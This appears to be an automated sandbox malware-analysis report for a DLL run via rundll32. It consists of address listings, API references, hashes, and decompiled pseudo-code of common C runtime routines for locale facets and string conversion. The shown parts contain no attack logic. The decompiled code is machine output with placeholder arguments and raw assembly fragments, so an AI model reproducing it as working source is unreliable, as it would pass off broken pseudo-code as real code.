                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b4
                          0x6e20f1b9
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F18A
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F194
                          • int.LIBCPMT ref: 6E20F1AB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E20F1CE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F1E5
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F205
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F223
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction ID: 649ac8905262ea0ce9a5533c418bffb154387899aa8052279c3b24696cb4d61b
                          • Opcode Fuzzy Hash: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction Fuzzy Hash: A511E37A90051DCFCF00DBE0C898AEEB77BBF84719F240909E4206B2D0DBB49A80C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E25621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6E246BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6E21F8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6E20DEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6E254640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6E20DEE1(_t100);
									goto L36;
								}
								_t62 = E6E254640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6E20DEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6E24F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6E2201B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6E254640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6E24F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E2201B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}



























                          0x6e256224
                          0x6e256225
                          0x6e256226
                          0x6e25622d
                          0x6e256232
                          0x6e256238
                          0x6e25623e
                          0x6e256244
                          0x6e256247
                          0x6e256247
                          0x6e25624a
                          0x6e25624c
                          0x6e25624c
                          0x6e25624a
                          0x6e25624e
                          0x6e256253
                          0x6e25625a
                          0x6e25625d
                          0x6e25625d
                          0x6e256279
                          0x6e25627f
                          0x6e256284
                          0x6e256417
                          0x6e25641b
                          0x6e25642a
                          0x6e25628a
                          0x6e25628a
                          0x6e25628d
                          0x6e256292
                          0x6e256296
                          0x6e2562ea
                          0x6e2562ea
                          0x6e2562ec
                          0x6e2562ee
                          0x6e25640c
                          0x6e25640c
                          0x6e25640e
                          0x6e25640f
                          0x00000000
                          0x6e256415
                          0x6e2562ff
                          0x6e256305
                          0x6e256307
                          0x00000000
                          0x00000000
                          0x6e25630d
                          0x6e25631f
                          0x6e256324
                          0x6e256328
                          0x00000000
                          0x00000000
                          0x6e256335
                          0x6e25636f
                          0x6e256372
                          0x6e256375
                          0x6e256377
                          0x6e256379
                          0x6e25637b
                          0x6e2563c7
                          0x6e2563c7
                          0x6e2563c9
                          0x6e2563c9
                          0x6e2563cb
                          0x6e256405
                          0x6e256406
                          0x00000000
                          0x6e25640b
                          0x6e2563df
                          0x6e2563e4
                          0x6e2563e6
                          0x00000000
                          0x00000000
                          0x6e2563ea
                          0x6e2563eb
                          0x6e2563ec
                          0x6e2563ef
                          0x6e25642b
                          0x6e25642e
                          0x6e2563f1
                          0x6e2563f1
                          0x6e2563f2
                          0x6e2563f2
                          0x6e2563ff
                          0x6e256401
                          0x6e256403
                          0x6e256434
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e256403
                          0x6e25637d
                          0x6e256380
                          0x6e256382
                          0x6e256384
                          0x6e256386
                          0x6e256389
                          0x6e25638e
                          0x6e2563a9
                          0x6e2563ab
                          0x6e2563b5
                          0x6e2563b7
                          0x6e2563b8
                          0x6e2563ba
                          0x00000000
                          0x00000000
                          0x6e2563bc
                          0x6e2563c2
                          0x6e2563c2
                          0x00000000
                          0x6e2563c2
                          0x6e256390
                          0x6e256392
                          0x6e256396
                          0x6e25639b
                          0x6e25639d
                          0x6e25639f
                          0x00000000
                          0x00000000
                          0x6e2563a1
                          0x00000000
                          0x6e2563a1
                          0x6e256337
                          0x6e25633c
                          0x00000000
                          0x00000000
                          0x6e256342
                          0x6e256344
                          0x00000000
                          0x00000000
                          0x6e25635b
                          0x6e256360
                          0x6e256364
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25636a
                          0x6e25629d
                          0x6e25629f
                          0x6e2562a1
                          0x6e2562a9
                          0x6e2562c8
                          0x6e2562ca
                          0x6e2562d4
                          0x6e2562d6
                          0x6e2562d7
                          0x6e2562d9
                          0x00000000
                          0x00000000
                          0x6e2562df
                          0x6e2562e5
                          0x6e2562e5
                          0x00000000
                          0x6e2562e5
                          0x6e2562ad
                          0x6e2562b1
                          0x6e2562b6
                          0x6e2562ba
                          0x00000000
                          0x00000000
                          0x6e2562c0
                          0x00000000
                          0x6e2562c0

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E23F290,6E23F290,?,?,?,6E256470,00000001,00000001,C5E85006), ref: 6E256279
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E256470,00000001,00000001,C5E85006,?,?,?), ref: 6E2562FF
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2563F9
                          • __freea.LIBCMT ref: 6E256406
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • __freea.LIBCMT ref: 6E25640F
                          • __freea.LIBCMT ref: 6E256434
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
                          • Instruction ID: c0875fdc6f949447c3dd43aeb7607c4dbc10faf2bd5cc5e17263358a06b767a1
                          • Opcode Fuzzy Hash: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
                          • Instruction Fuzzy Hash: 4251C47262021BAFEB258FE4CD90EBB77ABEB44750F154669EC14DA240DF34DC61C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2423DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E6E2423DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6E254E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6E24C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6E24CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6E254E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6E24E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6E242188();
							asm("int3");
							E6E220990(_t97, _t123, 0x6e2c2bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6E2423DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6E24D5FF(_t97, _t108, _t120);
								_v40 = _t76;
